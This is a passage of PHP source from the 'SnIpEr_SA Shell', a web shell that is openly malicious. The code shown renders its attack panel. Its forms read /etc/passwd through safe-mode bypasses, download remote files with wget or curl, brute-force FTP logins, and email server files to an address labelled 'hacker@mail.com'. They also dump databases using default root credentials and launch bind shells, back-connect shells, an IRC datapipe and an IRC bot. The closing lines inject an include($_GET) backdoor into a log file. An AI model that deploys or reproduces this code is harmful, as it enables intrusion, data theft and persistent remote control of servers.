4730	echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
4731	echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4732	echo $te.'</div>'.$table_end1.$fe;
4733	}
4734	if($safe_mode&&$unix&&function_exists('mb_send_mail')){
4735	echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts;
4736	echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4737	echo $te.'</div>'.$table_end1.$fe;
4738	}
4739	if($safe_mode&&function_exists('imap_list')){
4740	echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts;
4741	echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4742	echo $te.'</div>'.$table_end1.$fe;
4743	}
4744	if($safe_mode&&function_exists('imap_body')){
4745	echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts;
4746	echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4747	echo $te.'</div>'.$table_end1.$fe;
4748	}
4749	if($safe_mode)
4750	{
4751	echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts;
4752	echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
4753	echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4754	echo $te.'</div>'.$table_end1.$fe;
4755	}
4756	if(@ini_get('file_uploads')){
4757	echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
4758	echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts;
4759	echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
4760	echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
4761	echo $te.'</div>'.$table_end1.$fe;
4762	}
4763	if(!$safe_mode&&$unix){
4764	echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts;
4765	echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
4766	echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
4767	echo $te.'</div>'.$table_end1.$fe;
4768	}
4769	echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts;
4770	echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
4771	$arh = $lang[$language.'_text92'];
4772	if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; }
4773	if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; }
4774	if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
4775	echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
4776	echo $te.'</div>'.$table_end1.$fe;
4777	if(@function_exists("ftp_connect")){
4778	echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
4779	echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
4780	echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
4781	echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
4782	echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
4783	echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
4784	echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
4785	echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
4786	echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
4787	echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
4788	echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
4789	echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
4790	echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
4791	echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
4792	echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
4793	echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
4794	echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
4795	echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
4796	echo $te."</td>".$fe."</tr></div></table>";
4797	}
4798	if($unix && @function_exists("ftp_connect")){
4799	echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts;
4800	echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
4801	echo sr(15,"","<font face=tahoma size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
4802	echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
4803	echo $te.'</div>'.$table_end1.$fe;
4804	}
4805	if(@function_exists("mail")){
4806	echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
4807	echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
4808	echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
4809	echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
4810	echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
4811	echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
4812	echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
4813	echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
4814	echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
4815	echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
4816	echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
4817	echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from sniper_sa shell"))));
4818	echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
4819	echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
4820	echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
4821	echo $te."</td>".$fe."</tr></div></table>";
4822	}
4823	if($mysql_on\|\|$mssql_on\|\|$pg_on\|\|$ora_on)
4824	{
4825	$select = '<select name=db>';
4826	if($mysql_on) $select .= '<option>MySQL</option>';
4827	if($mssql_on) $select .= '<option>MSSQL</option>';
4828	if($pg_on) $select .= '<option>PostgreSQL</option>';
4829	if($ora_on) $select .= '<option>Oracle</option>';
4830	$select .= '</select>';
4831	echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
4832	echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
4833	echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
4834	echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
4835	echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
4836	echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
4837	echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
4838	echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
4839	echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
4840	echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
4841	echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
4842	echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
4843	echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
4844	echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
4845	echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
4846	echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
4847	}
4848	if(!$safe_mode&&$unix){
4849	echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
4850	echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
4851	echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'9999'));
4852	echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'SnIpEr'));
4853	echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
4854	echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
4855	echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
4856	echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
4857	echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
4858	echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'80'));
4859	echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
4860	echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
4861	echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
4862	echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
4863	echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'80'));
4864	echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
4865	echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
4866	echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
4867	echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
4868	echo $te."</td>".$fe."</tr></div></table>";
4869	}
4870
4871	if($unix){
4872	echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
4873	echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
4874	echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port1',35,'9999').ws(4).in('submit','submit',0,$lang[$language.'_butt3']));
4875	echo $te."</td>".$fe."</tr></div></table>";
4876	echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
4877	echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
4878	echo sr(40,"<b>".$lang[$language.'_text214'].$arrow."</b>",in('text','ircadmin',15,'ircadmin'));
4879	echo sr(40,"<b>".$lang[$language.'_text215'].$arrow."</b>",in('text','ircserver',15,'ircserver'));
4880	echo sr(40,"<b>".$lang[$language.'_text216'].$arrow."</b>",in('text','ircchanal',15,'ircchanl'));
4881	echo sr(40,"<b>".$lang[$language.'_text217'].$arrow."</b>",in('text','ircname',15,'ircname'));
4882	echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
4883	echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
4884	echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
4885	echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ips',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
4886	echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','ports',15,'80'));
4887	echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir));
4888	echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
4889
4890	echo $te."</td>".$fe."</tr></div></table>";
4891	}
4892	echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=tahoma size=-2><b>o---[ SnIpEr_SA Shell \| <a href=http://sniper-sa.com>http://sniper-sa.com</a> \| <a SnIpEr.SA@hotmail.com>sniper.sa@hotmail.com</a> \| ÊÚÑíÈ æÊØæíÑ ]---o</b></font></div></td></tr></table>".$f;
4893
4894	if(empty($_POST['log'])){
4895	} else {
4896	$log=$_POST['log'];
4897	echo error_log("<? print include(\$_GET[ss]) ?>", 3,$log);
4898	echo "</textarea></CENTER>";
4899	}
4900	?>

Download in other formats:

Original Format